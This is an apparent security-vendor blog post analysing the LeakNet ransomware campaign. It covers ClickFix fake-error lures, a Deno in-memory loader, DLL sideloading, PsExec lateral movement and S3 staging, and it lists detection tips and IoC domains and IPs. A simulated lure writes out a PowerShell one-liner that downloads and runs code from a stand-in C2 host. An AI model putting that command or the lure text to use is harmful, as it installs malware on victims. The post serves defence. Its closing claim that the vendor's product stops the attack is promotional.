LeakNet Ransomware Escalates: ClickFix Lures and Deno In-Memory Loader

Recent investigations show that LeakNet now delivers malicious “ClickFix” prompts via compromised legitimate websites. This social-engineering trick fools users into running a malicious msiexec command essentially giving the attacker a foothold without stealing credentials.

In parallel, LeakNet is using a novel Deno-based in-memory loader to run payloads, leaving minimal files on disk. Despite the new entry points, every confirmed LeakNet breach follows the same post-exploit steps (DLL sideload, lateral movement, and cloud staging). Defenders can leverage these predictable behaviors for detection and containment.

ClickFix Lures: A “Wide Net” Attack Vector

LeakNet’s new approach casts a wide net over potential victims. Compromised, trusted sites now host fake verification pages often mimicking Cloudflare or Windows messages that instruct users to press Win+R and paste a command. This tactic doesn’t target a specific industry or user; any employee who clicks through can trigger the malware.

ClickFix has already surged in popularity: last year, roughly 59% of top malware families used ClickFix-style lures to infect victims. In LeakNet’s case, the lure delivers the Deno-based loader when the user executes the command. This shift lets LeakNet bypass reliance on stolen credentials from initial-access brokers (IABs). Instead of waiting to buy access, the gang directly entices victims via innocent-looking sites.

Deno In-Memory Loader: Stealthy Payload Execution

Once the user runs the initial command, LeakNet rapidly shifts to a low-profile next phase. It has been established that the attacker indeed installs a legitimate copy of the Deno JavaScript/TypeScript runtime on the victim system and executes a base64-encoded payload on it. The “bring your own runtime” technique is utilized to avoid dropping any suspicious malware file.

Instead, Deno decodes and executes the malicious code directly in memory (via a data:application/javascript base64 URL). Since deno.exe is signed and trusted, whitelisting often lets it run unchecked.

The code executes immediately and starts fingerprinting the host by gathering information such as username, hostname, total memory size, operating system type, etc., hashing this information to create a unique ID, connecting to a command-and-control server to retrieve a second-stage payload, as well as entering a polling loop that retrieves new instructions or code from the C2.

ClickFix Attack: Phishing Simulation

Threat Intelligence Simulation

CLICKFIX: SOCIAL ENGINEERING ATTACK

Analyzing how adversaries use fake browser issues to trick users into executing malicious PowerShell commands.

                    < SCROLL TO ANALYZE THE CLICKFIX CHAIN >
                

STAGE 1: COMPROMISED ASSET

Initial Access: Attacker compromises a legitimate website (WordPress, etc.) and injects a script.

Injection: The script triggers a fake “DNS Connection Error” or “Browser Update” overlay to initiate the attack.

[NETWORK DETECT]
Injected: /wp-content/js/update.js
Logic: If UserAgent=Chrome -> Show Fix Modal

https://legit-business-site.com/resources

DNS Connection Error

Google Chrome cannot display the webpage. This is caused by an outdated browser component.

STAGE 2: MALICIOUS INSTRUCTIONS

Social Engineering: The “How to fix” button provides a PowerShell command to be copied and executed manually.

Trust: By asking the user to perform the action, attackers bypass automated browser security blocks.

https://legit-business-site.com/resources (Error)

Steps to update components:

Press Windows Key + R.
Type powershell and press Enter.
Paste the command below and press Enter.

powershell -ep bypass -w hidden -c "iex(iwr 'http://c2.link/p' -useb)"

STAGE 3: EXECUTION & DENO

Deno Runtime: The attacker downloads Deno (a legitimate JS runtime) to run malicious TypeScript/JS scripts locally.

In-Memory Payload: The malware is executed directly in memory to evade traditional file-based antivirus scans.

[PROCESS START]
1. Fetching deno.exe (silent)
2. Loading payload into RAM
3. No file written to disk

Windows PowerShell

PS C:\Users\Target> |

STAGE 4: DATA EXFILTRATION

Stealer Logic: Deno processes extract browser profiles, cookies, and local wallet data.

C2 Transmission: Data is compressed and sent to attacker-controlled high-rotation domains.

[LEAKNET DETECTED]
Type: InfoStealer (Vidar Variant)
Status: Uploading archive…

ATTACKER_C2_DASHBOARD (INTERNAL)

LIVE FEED ● STREAMING

CLICKFIX DEFENSE

Memory Protection

Use EDR tools with memory-scanning capabilities to detect Deno or Node.js runtimes performing suspicious memory operations.

Policy Control

Block unauthorized downloads of binary runtimes (like deno.exe) and restrict PowerShell ‘Invoke-Expression’ (IEX) usage.

Repeated Post-Exploitation Chain

The entry point is ultimately the same with both IAB and ClickFix. The following diagram illustrates the difference between the old broker-based path and the new ClickFix-based path.

In all instances of a LeakNet attack, the group has dropped a malicious jli.dll file into C:\ProgramData\USOShared. The goal is to hijack a legitimate Java process to load their code. The DLL sideloading is difficult to detect because it is using a legitimate executable in a known code location.

The next steps in the chain are to gather all available credentials with cmd.exe /c klist, followed by lateral movement with PsExec using all available credentials to execute the malware on other computers. Finally, tools are staged, and data is extracted using Amazon S3 buckets, which is legitimate network activity.

In short, LeakNet’s playbook is: DLL sideload → Credential harvesting → PsExec lateral movement → S3 staging. Because this chain repeats so reliably, defenders can write behavior-based rules (e.g. detecting a java.exe loading an unexpected DLL or PsExec commands by non-admin users) to catch the attack before encryption.

Key behaviors to watch for include:

A Java process loading a jli.dll from an unusual folder (notably USOShared).
PsExec usage that is out of line with normal admin activity (e.g. on workstations or by non-privileged accounts).
Unusual outbound traffic to cloud storage (AWS S3) or to known attacker-controlled domains, beyond typical business usage.

Defense and Detection Strategies

To defend against LeakNet, we need multiple layers of hardening. Network: block known malicious domains, especially newly observed ones used for C2 and payloads. Monitor DNS for unusual activity. Endpoints: restrict tools, e.g., block normal users from executing the Run command (Win + R) to stop copy-pasted commands, and restrict PsExec with Group Policy to admin users only.

More generally, we should focus on behavioral detection, non signature-based detection. Consider the following examples: browser/WP processes spawning msiexec, Deno processes spawning with a data: URL, etc. Making these policies more restrictive limits LeakNet’s capabilities, forcing them to rely on even less stealthy techniques.

Indicators of Compromise (IoCs)

The following domains and IPs have been observed in ClickFix/Deno attacks and LeakNet intrusions:

Xcitium Threat Labs

CLICKFIX ANALYSIS

ClickFix Campaign

tools.usersway.net

apiclofront.com

sendtokenscf.com

binclloudapp.com

Deno C2 Domains

okobojirent.com mshealthmetrics.com verify-safeguard.top

cnoocim.com crahdhduf.com serialmenot.com

Staging Assets

                    Bucket East-1
                    fastdlvrss.s3.us-east-1.amazonaws.com
                

                    Bucket Daily
                    backupdailyawss.s3.us-east-1.amazonaws.com
                

C2 Server IPs

194.31.223.42

144.31.2.161

87.121.79.6

87.121.79.25

144.31.54.243

144.31.224.98

Indicators of Compromise

Maintaining up-to-date blocklists and network monitoring for these IoCs can provide early warning of LeakNet attacks. By combining this with behavioral detections, organizations have their best chance to intercept the intrusion before ransomware hits.

Conclusion: LeakNet Proves Ransomware No Longer Waits for Stolen Access

LeakNet’s new ClickFix and Deno chain shows how quickly modern ransomware crews adapt when old access models slow down. Instead of waiting for brokers to sell credentials, the group now persuades users to launch the first stage themselves, then moves immediately into an in-memory loader, DLL sideloading, credential harvesting, lateral movement, and cloud staging. The delivery changed, but the outcome did not, rapid operational compromise followed by ransomware pressure.

Why This Threat Scales So Easily

This campaign succeeds because it combines human trust with stealthy execution.

Compromised legitimate sites host fake verification pages that instruct users to paste malicious commands
A signed Deno runtime is used to execute base64 payloads directly in memory, reducing file-based visibility
The post-exploitation chain is highly repeatable, DLL sideload, credential harvesting, PsExec lateral movement, then S3 staging

Once that chain starts, defenders are racing a process designed for speed.

Where Xcitium Changes the Outcome

If you have Xcitium, this attack would NOT succeed.

With Xcitium Advanced EDR, LeakNet fails at execution.

The malicious runtime chain is intercepted the moment it begins
Deno, Java sideloading, and follow-on payloads can attempt to run, but code can run without being able to cause damage
Credential harvesting, lateral movement, and ransomware deployment never become operational

The attacker loses because the first stage never becomes real system impact.

Stop the First Stage, Stop the Ransomware

LeakNet proves that modern ransomware does not need stolen passwords to win. It only needs one user to execute the first command. Reduce that chance with stronger user discipline, then enforce execution-time protection so the rest of the chain never matters.

Like what you see? Share with a friend.